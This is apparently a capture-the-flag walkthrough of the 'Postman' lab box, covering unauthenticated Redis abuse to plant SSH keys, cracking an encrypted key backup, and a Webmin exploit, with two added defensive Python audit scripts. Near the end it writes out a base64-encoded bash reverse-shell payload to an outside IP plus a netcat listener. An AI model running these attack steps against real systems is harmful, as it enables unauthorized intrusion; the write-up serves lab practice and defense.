Again, we start with nmap -sC -sV -Pn -p- -oA ./Postman 10.10.10.160
The scan turns up SSH, HTTP, Redis, and MiniServ (Webmin).
By now, you all know my aversion to Metasploit, but now that I know what to look for, I'm sure I can find an exploitation method outside of MSF. We come across CVE-2018-12326. So, to start, let's install redis on our Kali box so we have the redis-tools for later. To do that, we run:
sudo apt-get install redis
From there, we should be able to use redis-cli to connect to the box with redis-cli -h 10.10.10.160. Once connected, we can try a CONFIG GET * just to see if we can actually execute anything unauthenticated. Not surprisingly, we can.
There are 178 or so entries in the output of that command, but all we really needed to know is that we can execute commands. Running CONFIG GET DIR shows us that we are operating in the /var/lib/redis directory. Avinash had a pre-built exploit written here, but let's examine what it is actually doing (or it's no better than using MSF).
OK. It looks like this script is creating SSH keys and transferring them via redis-cli to the target. We could do that manually, but as I've said, hackers are lazy creatures. I'll re-use code/script as long as I understand what it is doing. That said, that script looks like it needs a valid username on the box, which we don't have. However, checking keys * in redis-cli and using GET cracklist, I can see the key that was created. Perhaps I can force the connection via key.
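What makes the unauthenticated CONFIG GET above dangerous, and what a planted key leaves behind on disk, are both things a defender can check for. The following is an added example, not code from the post or from the script it discusses: it audits a redis.conf fragment for the settings that allow unauthenticated CONFIG access (bind, protected-mode, requirepass, rename-command) and inspects an authorized_keys file for the RDB dump signature and non-key lines that a key written through Redis SAVE leaves around it. The sample configs and key files are constructed, and the assumption that the planted key arrives inside an RDB dump is mine, consistent with the "dir" and key-transfer behaviour the post describes.

```python
import re

# Constructed redis.conf fragments (not taken from the target box): the first is the
# kind of configuration that lets an unauthenticated client run CONFIG, the second
# closes each of those gaps.
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
dir /var/lib/redis
"""

HARDENED_CONF = """\
bind 127.0.0.1
protected-mode yes
port 6379
dir /var/lib/redis
requirepass REPLACE_WITH_LONG_RANDOM_SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

# Every RDB file Redis writes with SAVE starts with this magic, so it is a reliable
# marker of a file that Redis, not ssh-keygen or an admin, produced.
RDB_MAGIC = b"REDIS"

# One authorized_keys entry: optional options field, key type, base64 blob, optional comment.
# Heuristic: options containing spaces (e.g. command="a b") are not handled here.
KEY_LINE = re.compile(rb"^(?:[^\s#]+\s+)?(?:ssh-(?:rsa|ed25519|dss)|ecdsa-sha2-[\w-]+)\s+[A-Za-z0-9+/=]+")


def parse_redis_conf(text: str) -> dict:
    """Map each directive (lower-cased) to the list of argument lists it was given."""
    conf = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, *args = line.split()
        conf.setdefault(name.lower(), []).append(args)
    return conf


def audit_redis_conf(text: str) -> list:
    """Return the settings that allow the unauthenticated CONFIG GET/SET seen in the post."""
    conf = parse_redis_conf(text)
    findings = []
    binds = [a for args in conf.get("bind", []) for a in args]
    if not binds or any(b in ("0.0.0.0", "::", "*") for b in binds):
        findings.append("no restrictive bind: reachable from every interface")
    if ["no"] in conf.get("protected-mode", []):
        findings.append("protected-mode disabled")
    if "requirepass" not in conf:
        findings.append("no requirepass: commands accepted without AUTH")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    if "CONFIG" not in renamed:
        findings.append("CONFIG not renamed or disabled: dir/dbfilename can be changed remotely")
    return findings


def audit_authorized_keys(data: bytes) -> list:
    """Flag an authorized_keys file that looks like an RDB dump and any line that is not a key.
    sshd skips lines it cannot parse, which is why a key wrapped in RDB bytes still works,
    so the surrounding garbage is the thing to look for."""
    findings = []
    if RDB_MAGIC in data:
        findings.append("RDB signature present: file was written by Redis")
    for lineno, line in enumerate(data.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith(b"#"):
            continue
        if not KEY_LINE.match(entry):
            findings.append("line %d: not a parseable key entry" % lineno)
    return findings


# Constructed sample files: a normal authorized_keys and one that carries a key inside RDB bytes.
CLEAN_KEYS = b"ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedKeyBody admin@example\n"
PLANTED_KEYS = (b"REDIS0009\xfa\tredis-ver\x054.0.9\xfe\x00\x00\x07planted\x00\n\n"
                b"ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQConstructedKeyBody== constructed@example\n\n"
                b"\xff\x00")

if __name__ == "__main__":
    for label, conf in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(label, audit_redis_conf(conf))
    for label, keys in (("clean", CLEAN_KEYS), ("planted", PLANTED_KEYS)):
        print(label, audit_authorized_keys(keys))
```

Run against a real box, the authorized_keys check would be pointed at every ~/.ssh/authorized_keys, including the one under the Redis service account's home (here /var/lib/redis), since a service user that can log in over SSH is the other half of what made this work.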
Now before I go celebrating, this shell/user can hardly do anything. Round 2. Jump to /tmp, grab LinEnum.sh, and run it thoroughly to see what jumps out. And something does! /opt/id_rsa.bak, owned by "Matt". Let's see if we can view it.
So, it's encrypted. A simple ssh2john command takes care of that:
sudo /usr/share/john/ssh2john.py key.enc > clearkey.enc
sudo john --wordlist=/usr/share/wordlists/rockyou.txt clearkey.enc
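The key only fell because a backup copy sat outside Matt's home where the redis user could read it, and its passphrase was in rockyou. As an added example (not part of the post), here is a small audit that walks a directory tree, finds private key files, reports any readable by group or others, and tells you whether each one is passphrase-protected at all. The sample keys it writes are constructed minimal files (just the OpenSSH magic and cipher name), which is my own shortcut for the demo; the header and cipher-name layout it checks is the real OpenSSH/PEM format.

```python
import base64
import os
import stat
import tempfile
from pathlib import Path

PRIVATE_KEY_HEADERS = (
    b"-----BEGIN OPENSSH PRIVATE KEY-----",
    b"-----BEGIN RSA PRIVATE KEY-----",
    b"-----BEGIN EC PRIVATE KEY-----",
    b"-----BEGIN DSA PRIVATE KEY-----",
)
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def is_private_key(path: Path) -> bool:
    """Cheap header check so the walk does not read every file in full."""
    try:
        with path.open("rb") as f:
            head = f.read(64)
    except OSError:
        return False
    return any(head.startswith(h) for h in PRIVATE_KEY_HEADERS)


def key_is_passphrase_protected(path: Path) -> bool:
    """True when the key cannot be used without a passphrase.
    PEM keys announce encryption with a 'Proc-Type: 4,ENCRYPTED' header; the OpenSSH
    format stores a cipher name right after its magic, 'none' meaning unencrypted."""
    data = path.read_bytes()
    if b"Proc-Type: 4,ENCRYPTED" in data:
        return True
    if data.startswith(PRIVATE_KEY_HEADERS[0]):
        body = b"".join(l for l in data.splitlines() if not l.startswith(b"-----"))
        blob = base64.b64decode(body)
        if not blob.startswith(OPENSSH_MAGIC):
            return False
        off = len(OPENSSH_MAGIC)
        n = int.from_bytes(blob[off:off + 4], "big")
        return blob[off + 4:off + 4 + n] != b"none"
    return False


def find_exposed_private_keys(root: Path) -> list:
    """Return (path, reason) for every private key under root that group or others can read."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file() or not is_private_key(p):
                continue
            mode = p.stat().st_mode
            if mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((str(p), "mode %s lets other users read it" % stat.filemode(mode)))
    return findings


def _constructed_openssh_key(cipher: bytes) -> bytes:
    """Minimal constructed OpenSSH key file: just magic + cipher name, enough for the checks above."""
    blob = OPENSSH_MAGIC + len(cipher).to_bytes(4, "big") + cipher
    return (b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.encodebytes(blob)
            + b"-----END OPENSSH PRIVATE KEY-----\n")


def run_demo() -> dict:
    """Write constructed sample files into a temp dir and audit them."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        # A backup copy left world-readable, like the /opt/id_rsa.bak in the post: encrypted, but exposed.
        (root / "id_rsa.bak").write_bytes(_constructed_openssh_key(b"aes256-ctr"))
        os.chmod(root / "id_rsa.bak", 0o644)
        # A key with correct permissions but no passphrase at all.
        (root / "deploy_key").write_bytes(_constructed_openssh_key(b"none"))
        os.chmod(root / "deploy_key", 0o600)
        (root / "notes.txt").write_bytes(b"not a key\n")
        exposed = sorted(Path(p).name for p, _reason in find_exposed_private_keys(root))
        protected = {n: key_is_passphrase_protected(root / n) for n in ("id_rsa.bak", "deploy_key")}
        return {"exposed": exposed, "protected": protected}


if __name__ == "__main__":
    print(run_demo())
```

Pointing find_exposed_private_keys at / (or at /opt, /tmp, /var/backups and similar places where copies accumulate) is the defender's version of the LinEnum step above; an encrypted key is only as strong as its passphrase, so a hit on an exposed key should be treated as a compromised key regardless of what key_is_passphrase_protected says.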
It looks like Matt has a password of computer2008. Move from redis to Matt and grab the user flag. There's not a lot more we can do in the CLI right now, so let's jump over to port 10000 and its MiniServ Webmin page. Logging in with Matt:computer2008, we can grab the Webmin version (1.910) and see what's there. I eventually come across this Proof of Concept on GitHub and try it out, crafting my payload using:
echo -n 'bash -c "bash -i >& /dev/tcp/10.10.14.10/9999 0>&1"' | base64
nc -lvnp 9999
Let's send it off and see if it works. I did have to change the + signs to %2b's, but after that Boom! We have a winner and a root shell.